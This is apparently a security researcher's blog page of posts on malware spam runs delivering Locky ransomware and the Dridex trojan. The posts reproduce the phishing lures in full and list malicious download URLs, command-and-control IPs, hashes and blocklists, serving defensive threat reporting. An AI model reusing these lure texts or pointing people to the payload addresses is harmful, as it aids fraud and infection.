Sponsored by..

Showing posts with label Canada. Show all posts
Showing posts with label Canada. Show all posts

Wednesday, 9 November 2016

Malware spam: "Shell Fuel Card E-bill 8089620 for Account (rnd(B,S,F,H,A,D,C,N,M,L)}}776324 08/11/2016" leads to Locky

This spam has an interestingly malformed subject, however the attachment leads to Locky ransomware:

Subject:     Shell Fuel Card E-bill 8089620 for Account (rnd(B,S,F,H,A,D,C,N,M,L)}}776324 08/11/2016
From:     KELLY MOORHOUSE (kelly.moorhouse@edbn.org)
Date:     Wednesday, 9 November 2016, 12:52

KELLY MOORHOUSE

Last & Tricker Partnership

3 Lower Brook Mews
Lower Brook Street
Ipswich Suffolk IP4 1RA
T: 01473 252961  F: 01473 233709  M: 07778464004
email: kelly.moorhouse@edbn.org

This e-mail and any attachments may contain confidential and privileged
information and is intended only for the use of the individual or entity to
which it is addressed. If you are not the intended recipient, please notify
the sender immediately by return e-mail, delete this e-mail and destroy any
copies from your system; you should not copy the message or disclose its
contents to anyone. Any dissemination, distribution or use of this
information by a person other than the intended recipient is unauthorized
and may be illegal. We cannot accept liability for any damage sustained as a
result of software viruses and advise you to carry out your own virus checks
before opening any attachment.
Sender names vary, but the error in the subject persists in all versions. Attached is a ZIP file with a name beginning with "ebill" (e.g. ebill209962.zip) which contains a malicious .WSF script (e.g. 18EQ13378042.wsf) that looks like this.

For one sample script, the Hybrid Analysis and Malwr report indicate a binary is downloaded from one of the following locations:

alamanconsulting.at/0ftce4?aGiszrIV=gRLYYDHSna
naka-dent.mobi/0ftce4?aGiszrIV=gRLYYDHSna

This drops a malicious DLL with an MD5 of c1b0b1fb4aa56418ef48421c58ad1b58 and a detection rate of 13/56.

85.143.212.23/message.php (PrdmService LLC, Russia)
158.69.223.5/message.php (OVH, Canada)


These are the same C2s as seen here.

Recommended blocklist:
85.143.212.23
158.69.223.5


UPDATE

A full list of download locations from my usual source:
 
alamanconsulting.at/0ftce4
ayurvedic.by/0ftce4
ekaterinburg.kacatka.ru/0ftce4
hoangtranwater.com/0ftce4
hoteldseason.com/0ftce4
hotelvinayakpalace.in/0ftce4
hotloto.com/0ftce4
hqseconsulting.com/0ftce4
hupsoft.com/0ftce4
idontknow.eu/0ftce4
idplus.sg/0ftce4
ifreenet.it/0ftce4
ijai.fr/0ftce4
iloveyf.com/0ftce4
indospyshop.com/0ftce4
innsat.pl/0ftce4
inzt.net/0ftce4
iriscommunications.com.pk/0ftce4
istanbulsoft.com.tr/0ftce4
ivakil.com/0ftce4
jaysilverdp.com/0ftce4
jcuenca.es/0ftce4
jer.be/0ftce4
jingaiwang.com/0ftce4
joralan.es/0ftce4
jxhyhz.com/0ftce4
kembarastation.com/0ftce4
kenankaynak.com/0ftce4
ketoantamviet.edu.vn/0ftce4
konan.nl/0ftce4
kopeyskdom.ru/0ftce4
krasnodar-sp.ru/0ftce4
k-scope.ca/0ftce4
kyrre.cn/0ftce4
labtekindie.com/0ftce4
lacosanostra.co/0ftce4
lander.pl/0ftce4
laurenward.me/0ftce4
leftakis.gr/0ftce4
level3.tv/0ftce4
lifez.nl/0ftce4
lindafluge.no/0ftce4
lingerievalentine.ueuo.com/0ftce4
linkset.ro/0ftce4
lujin.ro/0ftce4
luke-woods.com/0ftce4
luostone.com/0ftce4
martos.pt/0ftce4
matbaa.be/0ftce4
mch.kz/0ftce4
mckm11.cba.pl/0ftce4
meditativyoga.net/0ftce4
micashu.org/0ftce4
michellemccarron.com/0ftce4
microscopiavirtual.cl/0ftce4
milagrotarim.com/0ftce4
mineralsteel.cl/0ftce4
mogadk.ru/0ftce4
mospi.ru/0ftce4
moydom.by/0ftce4
mschroll.de/0ftce4
mtsas.freehost.pl/0ftce4
muamusic.com/0ftce4
muellerhans.ch/0ftce4
musicphilicwinds.org/0ftce4
muziekupdate.nl/0ftce4
mvpdental.com/0ftce4
mypcdaddy.com/0ftce4
naarndonau.at/0ftce4
naka-dent.mobi/0ftce4
oontsheol.net/0ftce4
shukatsu-live.com/0ftce4
sport-grace.by/0ftce4
tikkatawgi.com/0ftce4
vologda.maxuma.ru/0ftce4
www.0898tz.com/0ftce4
www.limpotools.com/0ftce4

Malware spam: "Your Amazon.com order has dispatched" leads to Locky

Overnight there has been a massive fake Amazon spam run leading to Locky ransomware:

From:    Amazon Inc [auto-shipping27@amazon.com]
Date:    8 November 2016 at 23:10
Subject:    Your Amazon.com order has dispatched (#021-3323415-8170076)

Dear Customer,

Greetings from Amazon.com,

We are writing to let you know that the following item has been sent using  DHL Express.

For more information about delivery estimates and any open orders, please visit: http://www.amazon.com/your-account

Your order #021-3323415-8170076 (received November 8, 2016)


Your right to cancel:
At Amazon.com we want you to be delighted every time you shop with us.  O=
ccasionally though, we know you may want to return items. Read more about o=
ur Returns Policy at:  http://www.amazon.com/returns-policy/

Further, under the United Kingdom's Distance Selling Regulations, you have =
the right to cancel the contract for the purchase of any of these items wit=
hin a period of 7 working days, beginning with the day after the day on whi=
ch the item is delivered. This applies to all of our products. However, we =
regret that we cannot accept cancellations of contracts for the purchase of=
 video, DVD, audio, video games and software products where the item has be=
en unsealed. Please note that we are unable to accept cancellation of, or r=
eturns for, digital items once downloading has commenced. Otherwise, we can=
 accept returns of complete product, which is unused and in an "as new" con=
dition.

Our Returns Support Centre will guide you through our Returns Policy and, w=
here relevant, provide you with a printable personalised return label.  Ple=
ase go to http://www.amazon.com/returns-support to use our Returns Suppor=
t Centre.

To cancel this contract, please pack the relevant item securely, attach you=
r personalised return label and send it to us with the delivery slip so tha=
t we receive it within 7 working days after the day of the date that the it=
em was delivered to you or, in the case of large items delivered by our spe=
cialist couriers, contact Amazon.com customer services using the link bel=
ow within 7 working days after the date that the item was delivered to you =
to discuss the return.

https://www.amazon.com/gp/css/returns/homepage.html

For your protection, where you are returning an item to us, we recommend th=
at you use a recorded-delivery service. Please note that you will be respon=
sible for the costs of returning the goods to us unless we delivered the it=
em to you in error or the item is faulty. If we do not receive the item bac=
k from you, we may arrange for collection of the item from your residence a=
t your cost. You should be aware that, once we begin the delivery process, =
you will not be able to cancel any contract you have with us for services c=
arried out by us (e.g. gift wrapping).

Please also note that you will be responsible for the costs of collection i=
n the event that our specialist courier service collect a large item from y=
ou to return to us.

As soon as we receive notice of your cancellation of this order, we will re=
fund the relevant part of the purchase price for that item.=20

Should you have any questions, feel free to visit our online Help Desk at:=
=20
http://www.amazon.com/help

If you've explored the above links but still need to get in touch with us, =
you will find more contact details at the online Help Desk.=20

Note: this e-mail was sent from a notification-only e-mail address that can=
not accept incoming e-mail. Please do not reply to this message.=20

Thank you for shopping at Amazon.com

-------------------------------------------------
Amazon EU S.=C3=A0.r.L.
c/o Marston Gate
Ridgmont, BEDFORD MK43 0XP
United Kingdom
All the versions I have seen contain those same formatting errors. Details vary from message to message (e.g. carrier, reference numbers). Attached is a malicious ZIP file (e.g. ORDER-608-0848796-6857907.zip) containing a malicious javascript file (e.g. F-9295287522-9444213500-201611165156-2601.js) that looks like this.

My usual source (thank you) tells me that the various scripts download a component from these locations:

adultmagstore.co.uk/7845gf
asrcargo.ru/7845gf
bygg-molde.no/7845gf
chewysissy.net/7845gf
elektrickekefky.sk/7845gf
examsbank.com/7845gf
facerecognition.com.ba/7845gf
gadgetdealz.net/7845gf
girdap.org/7845gf
gpsfiles.nl/7845gf
heatsavingsystems.com/7845gf
helpcomm.com/7845gf
hnzhengzhou.com/7845gf
holzhaus.cl/7845gf
hud3.net/7845gf
hunt-magazine.com/7845gf
hydroservis.sk/7845gf
hz9m.com/7845gf
iaam.com.br/7845gf
igraficas.com/7845gf
immobilienbegleitung.de/7845gf
infosors.com/7845gf
inkjetss.com/7845gf
interabc.nl/7845gf
inteza.pl/7845gf
ipaper.ro/7845gf
irinka.ru/7845gf
islamhizmeti.com/7845gf
i-solutions.cz/7845gf
ivocal.fr/7845gf
izmirisgb.com/7845gf
janzwolinski.freehost.pl/7845gf
jgtour.wz.cz/7845gf
jlxzy.net/7845gf
jpvintage.nl/7845gf
jrockish.bravepages.com/7845gf
julian-g.ro/7845gf
karacanalbum.com/7845gf
kedaikerinchi.com/7845gf
khashchevato42.ru/7845gf
kiannaghsh.ir/7845gf
kleansys.com/7845gf
kolumbia.free.bg/7845gf
krd-php.ru/7845gf
kurdinfo.ru/7845gf
lekstom.ru/7845gf
lloveras.com/7845gf
mapbook.ir/7845gf
markanltd.com/7845gf
markscheffel.de/7845gf
masiled.es/7845gf
masterimob.ro/7845gf
materlux.ru/7845gf
mavicicek.com/7845gf
maytinhcaobang.net/7845gf
mdk-wear.ru/7845gf
mediclo.pl/7845gf
meshok.com.ua/7845gf
mh500.com/7845gf
minoritycounselor.com/7845gf
minunat.eu/7845gf
mischiefexpeditions.asia/7845gf
mjtmak.com/7845gf
mokinukai.lt/7845gf
monkey-drum.com/7845gf
monster-high.com.ua/7845gf
moveus.com.br/7845gf
mtgchile.cl/7845gf
mtntelekom.com/7845gf
muaban86.net/7845gf
musicrecruiting.com/7845gf
muzica-evenimente.ro/7845gf
mw077.ru/7845gf
myhtar.ru/7845gf
myxos.be/7845gf
naruby.kvalitne.cz/7845gf
natalilife.ru/7845gf
sport-grace.by/7845gf
teazexebec.com/7845gf
yastrebov25.sat34.ru/7845gf

It appears to drop a malicious DLL with a detection rate of 32/56. The following C2 servers have been identified:

85.143.212.23/message.php (PrdmService LLC, Russia)
158.69.223.5/message.php (OVH, Canada)


UPDATE
According to the Hybrid Analysis the dropped Locky binary actually has an MD5 of ad6fb318002df4ffc80795cc31d529b4 and a detection rate of 28/56.

Recommended blocklist:
85.143.212.23
158.69.223.5



Thursday, 17 March 2016

Malware spam: "Remittance Adivce" from random senders

This fake financial spam has a malicious attachment and poor spelling in the subject field.

From:    Booth.Garth19@idsbangladesh.net.bd
Date:    17 March 2016 at 09:17
Subject:    Remittance Adivce


Please find attached a remittance advice for payment made yo you today.

Please contact the accounts team on 020 2286 7847 or via reply email for any queries regarding this payment.

Kind Regards

Garth Booth
Sender names, contact number and attachment names vary, but I have seen just a single variant of the attachment with a VirusTotal detection rate of 1/55. The Malwr report for this sample sees a download from:

bakery.woodwardcounseling.com/michigan/map.php

This download location is almost certainly completely malicious, and is hosted at:

217.12.199.94 (ITL, Ukraine)

This dropped file has a detection rate of 3/56. That VirusTotal and this Malwr report indicate network traffic to:

38.64.199.33 (PSINet, Canada)
188.93.239.28 (DotSi, Portugal)


The payload is uncertain, but it could be the Dridex banking trojan.

UPDATE

The DeepViz analysis  also shows traffic to:

85.17.155.148 (Leaseweb, Netherlands)

Recommended blocklist:
217.12.199.94
38.64.199.33
188.93.239.28
85.17.155.148

Tuesday, 8 March 2016

Malware spam: Pay_Advice_Vendor_0000300320_1000_for_03.03.2016 / Accounts Payable [vendoramendments@yorkshirewater.co.uk]

This fake financial spam does not come from Yorkshire Water but is instead a simple forgery with a malicious attachment.

From     Accounts Payable [vendoramendments@yorkshirewater.co.uk]
Date     Tue, 08 Mar 2016 10:32:52 +0200
Subject     Pay_Advice_Vendor_0000300320_1000_for_03.03.2016

-----------------------------------------

Spotted a leak?
If you spot a leak please report it immediately. Call us on 0800 57 3553 or go to
http://www.yorkshirewater.com/leaks

Get a free water saving pack
Don't forget to request your free water and energy saving pack, it could save you
money on your utility bills and help you conserve water. http://www.yorkshirewater.com/savewater

The information in this e-mail, and any files transmitted with it, is confidential
and may also be legally privileged. The contents are intended solely for the addressee
only and are subject to the legal notice available at http://www.keldagroup.com/email.htm.
This email does not constitute a binding offer, acceptance, amendment, waiver or
other agreement, or create any obligation whatsoever, unless such intention is clearly
stated in the body of the email. If you are not the intended recipient, please return
the message by replying to it and then delete the message from your computer. Any
disclosure, copying, distribution or action taken in reliance on its contents is
prohibited and may be unlawful.

Yorkshire Water Services Limited
Registered Office Western House, Halifax Road, Bradford, BD6 2SZ
Registered in England and Wales No 2366682
I have only seen a single sample with an attachment named Pay_Advice_Vendor_0000300320_1000_for_03.03.2016.PDF.ZIP which contains a randomly-named malicious script with a detection rate of 3/54.

According to the Malwr report and Hybrid Analysis on this sample, it downloads a malicious binary from:

lhs-mhs.org/9uj8n76b5.exe

This binary has a detection rate of 2/54 and all those reports indicate that it phones home to:

38.64.199.3 (PSINet, Canada)

I recommend that you block traffic to that IP. The Malwr report on the dropped binary is inconclusive, but it looks like the Dridex banking trojan.

Thursday, 21 January 2016

Malware spam: "Invoice from COMPANY NAME - 123456"

This spam comes from random senders at random companies with random reference numbers. The attachment is named to reflect those values. For example:

From:    Bettye Davidson
Date:    21 January 2016 at 08:24
Subject:    Invoice from DRAGON OIL - 8454985

 Please find attached a copy of your invoice

 Many Thanks



 Bettye Davidson
 DRAGON OIL


Attachment: DRAGON OIL - inv8454985.DOC

================

From:    Charlotte Atkinson
Date:    21 January 2016 at 08:23
Subject:    Invoice from GULF FINANCE HOUSE - 40610

 Please find attached a copy of your invoice

 Many Thanks



 Charlotte Atkinson
 GULF FINANCE HOUSE

Attachment: GULF FINANCE HOUSE - inv40610.DOC


================

From:    Lucien Drake
Date:    21 January 2016 at 09:26
Subject:    Invoice from HYDROGEN GROUP PLC - 477397

 Please find attached a copy of your invoice

 Many Thanks



 Lucien Drake
 HYDROGEN GROUP PLC

Attachment: HYDROGEN GROUP PLC - inv477397.doc
So far I have seen a couple of different versions of the attachment (VirusTotal [1] [2]) which according to Malwr [3] [4] both download a malicious binary from:

5.189.216.101/dropbox/download.php

This IP belongs to LLHost Inc, Netherlands. You can assume that the IP is malicious.

The dropped binary is named rare.exe, and has an MD5 e6f67b358009f66f1a4840c1eff19c2e of and a detection rate of 4/53. The Malwr report for this shows it phoning home to:

198.50.234.211 (OVH, Canada)

The payload is the Dridex banking trojan, and this behaviour is characteristic of Botnet 120.

Recommended blocklist:
198.50.234.211
5.189.216.101

Tuesday, 19 January 2016

Malware spam: "Remittance Advice 1B859E37" / "Bellingham + Stanley"

This fake financial does not come from Bellingham + Stanley but is instead a simple forgery with a malicious attachment. Reference numbers and sender names will vary.

From:    Adeline Harrison [HarrisonAdeline20@granjacapital.com.br]
Date:    19 January 2016 at 09:45
Subject:    Remittance Advice 1B859E37

For the attention of Accounts Receivable,

We are attaching an up to date remittance advice detailing the latest payment on your account.

Please contact us on the email address below if you would like your remittance sent to a different email address, or have any queries regarding your remittance.


Kind regards,
Adeline Harrison

Best Regards,

Adeline Harrison
Senior Finance Assistant, Bellingham + Stanley

Bellingham + Stanley
Longfield Road
Tunbridge Wells
Kent, TN2 3EY
United Kingdom
Office: +44 (0) 1892 500406
Fax: +44 (0) 1892 543115
HarrisonAdeline20@granjacapital.com.br
www.bellinghamandstanley.com
I have seen at least four different variations of the attachment, named in the format remittance_advice14DDA974.doc (VirusTotal results [1] [2] [3] [4]). These Malwr reports [5] [6] [7] [8] show those samples communicating with:

http://179.60.144.19/victor/onopko.php
http://5.34.183.127/victor/onopko.php

Those IPs are:
179.60.144.19 (Veraton Projects, Netherlands)
5.34.183.127 (ITL Company, Ukraine)


UPDATE 1this related spam run also downloads from:

91.223.88.206/victor/onopko.php

This is allocted to "Private Person Anton Malyi" in Ukraine.

A file aarab.exe is dropped (MD5 05219ea0aefedc873cecaa1f5100c617) [VT 4/53] which appears to communicate with:

198.50.234.211 (OVH, Canada)

I strongly recommend that you block traffic to that IP. The payload is the Dridex banking trojan, this attack is consistent with botnet 120.

UPDATE 2

This other Dridex 120 spam run uses different download locations:

46.17.100.209/aleksei/smertin.php
31.131.20.217/aleksei/smertin.php


The dropped "aarab.exe" file is also different, with an MD5 of c19959c2d372a7d40d4ba0f99745f114 and a detection rate of just 2/54.


Recommended blocklist:
198.50.234.211
179.60.144.19
5.34.183.127
91.223.88.206
46.17.100.209
31.131.20.217

Tuesday, 22 December 2015

Malware spam: "British Gas - A/c No. 602131633 - New Account" / trinity [trinity@topsource.co.uk]

This fake financial email is not from TopSource, Trinity Restaurants or British Gas (the email seems a bit confused), but is instead a simple forgery with a malicious attachment.

From:    trinity [trinity@topsource.co.uk]
Date:    22 December 2015 at 10:36
Subject:    British Gas - A/c No. 602131633 - New Account

Hi ,

Please refer to the attached invoice from British Gas, the account number on it is different from all the account numbers that we currently have in the system. Can you confirm if this is a new account so that we will create this in system.

Thanks & Regards,
Pallavi Parvatkar

Trinity Restaurants Accounts Team | TopSource Global Solutions | 020 3002 6203
4th Floor | Marlborough House | 10 Earlham Street | London WC2H 9LN | www.topsource.co.uk
    cid:image001.jpg@01D071F6.5F7DAE30                                                               cid:image002.jpg@01D071F6.5F7DAE30
 
cid:image003.png@01D071F6.5F7DAE30     cid:image004.png@01D071F6.5F7DAE30     cid:image005.png@01D071F6.5F7DAE30    cid:image006.png@01D071F6.5F7DAE30    cid:image007.png@01D071F6.5F7DAE30                                                       cid:image003.png@01D071F6.5F7DAE30     cid:image004.png@01D071F6.5F7DAE30    cid:image005.png@01D071F6.5F7DAE30    cid:image008.png@01D071F6.5F7DAE30    cid:image006.png@01D071F6.5F7DAE30    cid:image009.png@01D071F6.5F7DAE30


Disclaimer:
The information contained in this communication is intended solely for the use of the individual or entity to whom it is addressed and others authorized to receive it. It may contain confidential or legally privileged information. If you are not the intended recipient you are hereby notified that any disclosure, copying, distribution or taking any action in reliance on the contents of this information is strictly prohibited and may be unlawful. If you have received this communication in error, please notify us immediately by responding to this email and then delete it from your system.

Internet communications cannot be guaranteed to be timely, secure, error or virus-free. TopSource does not accept liability for any errors or omissions.

"SAVE PAPER - THINK BEFORE YOU PRINT!"




British Gas.doc
92K

Attached is a file British Gas.doc with an MD5 a VirusTotal detection rate of 2/54. Analysis of the document is pending, however it will most likely drop the Dridex banking trojan.

UPDATE

These automated analyses [1] [2] show that the malicious document downloads from:

weddingme.net/786h8yh/87t5fv.exe

This has a VirusTotal detection rate of 3/54.  All those reports indicate malicious traffic to:

199.7.136.88 (Megawire, Canada)
151.80.142.33 (OVH, France)


The payload looks like Dridex.

MD5s:
cacb79e05cf54490a7067aa1544083fa
c8694f1573a01b8b2cb7b1b502eb9372

Recommended blocklist:
199.7.136.88
151.80.142.33


Monday, 21 December 2015

Malware spam: "INVOICE" / "Brenda Howcroft [accounts@swaledalefoods.co.uk]"

This fake financial spam does not come from Swaledale Foods but is instead a simple forgery with a malicious attachment.

From:    Brenda Howcroft [accounts@swaledalefoods.co.uk]
Date:    21 December 2015 at 10:46
Subject:    INVOICE

Your report is attached in DOC format. To load the report, you will need the free Microsoft® Word® reader, available to download at http://www.microsoft.com/


Many thanks,

Brenda Howcroft
Office Manager

t 01756 793335 sales
t 01756 790160 accounts


cid:377F41D9-BDEF-4E30-A110-21CFAAA1D908@home


This email transmission is confidential and intended solely for the person or organisation to whom it is addressed. If you are not the intended recipient or have received this e-mail in error please delete it immediately and notify the sender, Any disclosure including copying or distribution of the information contained herein is strictly prohibited. Any opinions, instructions or advice contained in this email may not necessarily be those of the company. Although this email and any attachments are believed to be free of any virus or other defects, which might affect any computer or system it is the responsibility of the recipient to ensure they are virus free. E&OE.


Invoice 14702.doc
83K

Attached is a file Invoice 14702.doc which comes in at least 9 different versions (VirusTotal results [1] [2] [3] [4] [5] [6] [7] [8] [9]). I haven't had the chance to analyse them, but my sources say that at least some versions download from the following locations:

110.164.184.28/jh45wf/98i76u6h.exe
getmooresuccess.com/jh45wf/98i76u6h.exe
rahayu-homespa.com/jh45wf/98i76u6h.exe

This dropped file has a detection rate of 6/54. The Hybrid Analysis report plus some other sources indicate network traffic to:

199.7.136.88 (Megawire, Canada)
151.80.142.33 (OVH, France)
202.69.40.173 (Gerrys Information Technology (pvt) Ltd, Pakistan)
78.47.66.169 (Hetzner, Germany)


The payload is the Dridex banking trojan.

MD5s:
6932A004CE3AD1AD5EA30F43A31B0285
49CF8C70BC4E94F6887ED0CBC426F08C
92B1F1B4BBD864411FA75C951D28EC5D
E4CB705754C93645D3F86F8AF9307769
D409889F92DA9B8D855C0037894A46CC
87CA159B9AEB127F698D2AA28A5BAAC5
C770760C66298301D1BE29E85ECBE971
F2FF5FCE2836025E97691937D6DF579E
6617EAB5B4DD17247DFF1819CA444674
EE57F929672651C1AE238EB7C7A0D734


Recommended blocklist:
199.7.136.88
151.80.142.33
202.69.40.173
78.47.66.169

Wednesday, 16 December 2015

Malware spam: "Invoice No. 22696240" / "Sharon Samuels" [sharons463@brunel-promotions.co.uk]

This fake financial email does not come from Brunel Promotions but is instead a simple forgery with a malicious attachment.

From     "Sharon Samuels" [sharons463@brunel-promotions.co.uk]
Date     Wed, 16 Dec 2015 14:46:12 +0300
Subject     Invoice No. 22696240

  Good morning

Please find attached your latest invoice, for your attention.

Please be advised that your goods have been despatched for delivery.

Regards

Sharon
--------------------------------------------
Calendars and Diaries of Bristol Limited
Hope Road
Bedminster

BRISTOL
Bristol
BS3 3NZ
United Kingdom
Tel:01179636161
Fax:01179664235
Various details in the message change, such as the invoice number. I have seen two attachments with detection rates of 4/55 [1] [2] which according to Malwr [3] [4] download a malicious binary from the following locations:

winnig.privat.t-online.de/98g654d/4567gh98.exe
printempsroumain.org/98g654d/4567gh98.exe


This executable has a detection rate of 3/52 and these automated analyses [1] [2] [3] [4] indicate network traffic to:

199.7.136.84 (Megawire, Canada)
202.69.40.173 (Gerrys Information Technology (PVT) Ltd, Pakistan)
221.132.35.56 (Ho Chi Minh City Post and Telecom Company, Vietnam)


The payload is the Dridex banking trojan, probably.

MD5s:
d73d599ef434d7edad4697543a3e8a2b
7bcf4a947a74866debbcdeae068541fe
1cf8d5ab33c7e9e603d87d482c1c865d


Recommended blocklist:
199.7.136.84
202.69.40.173
221.132.35.56



Malware spam: "Your e-Invoice(s) from Barrett Steel Services Ltd" / "samantha.morgan@barrettsteel.com"

This fake financial spam does not come from Barrett Steel Services Ltd but is instead a simple forgery with a malicious attachment:

From:    samantha.morgan@barrettsteel.com
Date:    16 December 2015 at 09:44
Subject:    Your e-Invoice(s) from Barrett Steel Services Ltd

Dear Customer,

Please find attached your latest Invoice(s).

Kind Regards,
Samantha Morgan,
Barrett Steel Services Ltd,

Phone: 01274654248
Email: samantha.morgan@barrettsteel.com


PS
Have you considered paying by BACS ?  Our details can be found on the attached invoice.

Please reply to this email if you have any queries.


You can use the link below to perform an Experian credit check.

http://www.experian.co.uk/business-check/landing-page/barrett-steel.html?utm_source=BarrettSteel&utm_medium=Banner&utm_campaign=BusinessCheckBS

Samantha Morgan
Credit Controller

Tel: 01274 654248 |  | Fax: 01274 654253
Email: Samantha.Morgan@Barrettsteel.com | Web: www.barrettsteel.com


------------------------------------------------------------------------------
IMPORTANT NOTICE

The information contained in or attached to this e-mail is intended for the use of the individual or entity to which it is addressed. It may contain information which is confidential and/or covered by legal, professional or other privilege (or other similar rules or laws). If you are not the intended recipient, or a person responsible for delivering it to the intended recipient, you are not authorised to and must not disclose, copy, distribute, or retain this message or any part of it.  Nor should you take any action with reference to it. If you have received this communication in error, please return it with the title "received in error" to Barrett.Admin@Barrettsteel.com then delete the email and destroy any copies of it.

This email has been scanned for viruses, but no responsibility is accepted once this communication has been transmitted. You should scan attachments (if any) for viruses.

Registered Office:
Barrett House, Cutler Heights Lane, Dudley Hill, Bradford, BD4 9HU

This message has been scanned by iCritical.

Attached is a file e-Invoice Barrett Steel Services Ltd.doc which I have seen just a single variant of, with a VirusTotal detection rate of 4/54 which according to this Malwr analysis downloads a malicious binary from the following location:

wattplus.net/98g654d/4567gh98.exe

This downloaded binary has a detection rate of 4/53 and according to this Malwr report it attempts to contact:

199.7.136.84 (Megawire, Canada)

I strongly recommend that you block traffic to that IP. Other analysis is pending. The payload is almost definitely the Dridex banking trojan.

Tuesday, 15 December 2015

Malware spam: "Order PS007XX20000584" / "Nicola Hogg [NHogg@pettywood.co.uk]"

This rather brief spam does not come from Petty Wood but is instead a simple forgery with a malicious attachment:
From:    Nicola Hogg [NHogg@pettywood.co.uk]
Date:    15 December 2015 at 10:14
Subject:    Order PS007XX20000584
There is no body text, but instead there is an attachment PS007XX20000584 - Confirmation with Photos.DOC which has a VirusTotal detection rate of 5/55 and it contains a malicious macro [pastebin] which (according to this Malwr report) downloads a binary from:

kutschfahrten-friesenexpress.de/8iy45323f/i87645y3t23.exe

There are probably other version of the document with different download locations. This malicious executable has a detection rate of 2/54 and between them these three reports [1] [2] [3] indicate malicious traffic to:

199.7.136.84 (Megawire Inc, Canada)
221.132.35.56 (Ho Chi Minh City Post And Telecom Company, Vietnam)


The payload here is likely to be the Dridex banking trojan.

MD5s:
8b288305733214f8e0d95386d886af2d
f9c00d3db5fa6cd33bc3cd5a08766ad0


Recommended blocklist:
199.7.136.84
221.132.35.56

Monday, 14 December 2015

Malware spam: "Invoice 14 12 15" / "THUNDERBOLTS LIMITED [enquiries@thunderbolts.co.uk]"

This terse fake financial spam is not from the awesomely-named Thunderbolts Limited but is instead a simple forgery with a malicious attachment:
From:    THUNDERBOLTS LIMITED [enquiries@thunderbolts.co.uk]
Date:    14 December 2015 at 11:15
Subject:    Invoice 14 12 15

This message contains 2 pages in PDF format.
Curiously, the bad guys have gone as far as to include a fake header to make it look like a fax:

X-Mailer: ActiveFax 3.92
 
Attached is a file fax00163721.xls which is fairly obviously not a PDF document. So far I have seen two versions of this with a detection rate of 6/55 [1] [2] and which these Malwr reports [3] [4] indicate download a malicious binary from:

exfabrica.org/437g8/43s5d6f7g.exe
test-cms.reactive.by/437g8/43s5d6f7g.exe


This binary has a detection rate of 0/54. That VirusTotal report and this Hybrid Analysis both show traffic to:

199.7.136.84 (Megawire, Canada)

This malware is likely to be Dridex. Given that it is similar to the one found here,  I would recommend blocking network traffic to:

199.7.136.84
221.132.35.56
202.69.40.173
78.47.66.169


MD5s:
a0de2560362cc6dfc53d1cd5ff50559b
bd22c4b0b6996a8405b2d33696e1e71e
b1fff594a8877042efd0ed4d67f6feb6




Malware spam: "Scan from a Samsung MFP" / "Gareth Evans [gareth@cardiffgalvanizers.co.uk]"

This fake scanned document does not come from Cardiff Galvanizers but is instead a simple forgery with a malicious attachment.
From:    Gareth Evans [gareth@cardiffgalvanizers.co.uk]
Date:    14 December 2015 at 10:43
Subject:    FW: Scan from a Samsung MFP

Regards

Gareth

-----Original Message-----

Please open the attached document. It was scanned and sent to you using a
Samsung MFP. For more information on Samsung products and solutions, please
visit http://www.samsungprinter.com.


This message has been scanned for malware by Websense. www.websense.com
I have seen just a single sample of this, named Untitled_14102015_154510.doc and with a VirusTotal detection rate of 7/54. It contains a malicious macro [pastebin] which according to this Malwr report downloads a malicious binary from:

test1.darmo.biz/437g8/43s5d6f7g.exe

There will probably be other versions of the document downloading from the same location. The binary has a VirusTotal detection rate of 1/54. Those two reports plus this Hybrid Analysis indicate network traffic to the following malicious IPs:

199.7.136.84 (Megawire, Canada)
221.132.35.56 (Ho Chi Minh City Post And Telecom Company, Vietnam)
202.69.40.173 (Gerrys Information Technology (PVT) Ltd, Pakistan)
78.47.66.169 (Hetzner, Germany)


The payload is likely to be the Dridex banking trojan.

MD5s:
dcb019624fb8e92eb26adf2bef77d46c
21781d7e2969bd9676492c407a3da1cc


Recommended blocklist:
199.7.136.84
221.132.35.56
202.69.40.173
78.47.66.169



Monday, 7 September 2015

Something evil on 184.105.163.192/26 / White Falcon Communications / Dmitry Glazyrin

So.. I spotted some Nuclear EK (or some other Flash exploit) traffic on our network which attracted my interest. The IP in question was 184.105.163.243 hosted on what appears to be a Hurricane Electric IP. Personally, I don't tend to see a lot of bad stuff on HE so I looked more closely at the IP WHOIS and saw it was part of a range 184.105.163.192/26 suballocated to:

contact:ID;I:POC-DC-1258
contact:Auth-Area:contacts
contact:Class-Name:contact
contact:Name:Dmitry Glazyrin
contact:Company:White Falcon Communications
contact:Street-Address:3-758 Riverside Dr
contact:City:Port Coquitlam
contact:Province:BC
contact:Postal-Code:V3B 7V8
contact:Country-Code:CA
contact:Phone:+1-510-580-4100


The next step was to query the range using DNSDB to see what has been hosted there. This came back with several thousand sites that have been hosted there in the past, the following of which are still hosted in the 184.105.163.192/26 range now..

bilettver.ru
ituslugi-ekb.ru
kerept.ru
porno-gt.com
pornosup.com
redkrab.com
vgubki.com
erotubik.com
autowagen.ru
decoitalcolor.ru
jimbobox.ru
kr-enot.ru
alemanas.ru
dynamo-energia.ru
master-lesa.ru
kinoprosmotra.net
multi-torrent.com
pl-games.ru
voyeur-hard.com
fishemania.com
learnigo.ru
qazashki.net
surfus.ru
mysuppadomainname.gq
kinoprosmotrov.net
multtracker.com
kyricabgr.tk
onlyhdporno.com
stat-irc.tk
white-wolves.tk
blondescript.com
dc-dcbcf352.hotvideocentral.com
wishfishworld.com
5ka.info
igro-baza1.ru
igro-baza2.ru
igro-baza3.ru
igro-baza4.ru
igro-baza5.ru
kinorelizov.net
torrent-mult.com
trailer-games.ru
vvpvv10.ru
vvpvv9.ru
todoke.ru
glazikvovana.cf
glazikvovana.ga
glazikvovana.gq
glazikvovana.ml
glazikvovana.tk
glazikvovki.cf
glazikvovki.ga
glazikvovki.gq
glazikvovki.ml
glazikvovki.tk
popochkavovana.cf
popochkavovana.ga
popochkavovana.gq
popochkavovana.ml
popochkavovana.tk
popochkavovki.cf
popochkavovki.ga
popochkavovki.gq
popochkavovki.ml
popochkavovki.tk
resnichkavovana.cf
resnichkavovana.ga
resnichkavovana.gq
resnichkavovana.ml
resnichkavovana.tk
resnichkavovki.cf
resnichkavovki.ga
resnichkavovki.gq
resnichkavovki.ml
resnichkavovki.tk
samaragss.ru
wechkavovana.cf
wechkavovana.ga
wechkavovana.gq
wechkavovana.ml
wechkavovana.tk
wechkavovki.cf
wechkavovki.ga
wechkavovki.gq
wechkavovki.ml
wechkavovki.tk
zalypkavovana.ml
zalypkavovana.tk

zalypkavovki.cf
zalypkavovki.ga
zalypkavovki.gq
zalypkavovki.ml
zalypkavovki.tk
zybikvovana.cf
